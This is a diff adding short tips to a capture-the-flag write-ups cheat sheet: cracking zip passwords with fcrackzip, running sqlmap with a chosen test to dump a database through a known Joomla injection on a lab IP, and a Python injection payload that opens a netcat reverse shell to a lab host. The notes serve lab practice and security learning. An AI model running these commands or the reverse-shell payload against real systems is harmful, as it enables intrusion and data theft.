ChrisPritchard/ctf-writeups/TIPS-AND-TRICKS.md

 ## cracking zips

 apart from zip2john and john, there is also `fcrackzip -b --method 2 -D -p rockyou.txt -v extracted.zip`

+## Injections

+Raw sqlmap will go through all its tests, which might take ages.
+If you know the test to use, then you can actually specify it in the sqlmap command.

+`sqlmap -u "http://10.10.69.3/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --test-filter="MySQL >= 5.0 error-based - Parameter replace (FLOOR)" --random-agent --dump -p list[fullordering]`

+In the above, exploiting https://www.exploit-db.com/exploits/42033, I know the param and the test that will work, so I specify both and jump straight to the dumping.

+If able to inject some python script, e.g. into unsanitised input, this can work:

+`__import__('os').popen('nc 10.10.106.5 4444 -e /bin/sh').read()`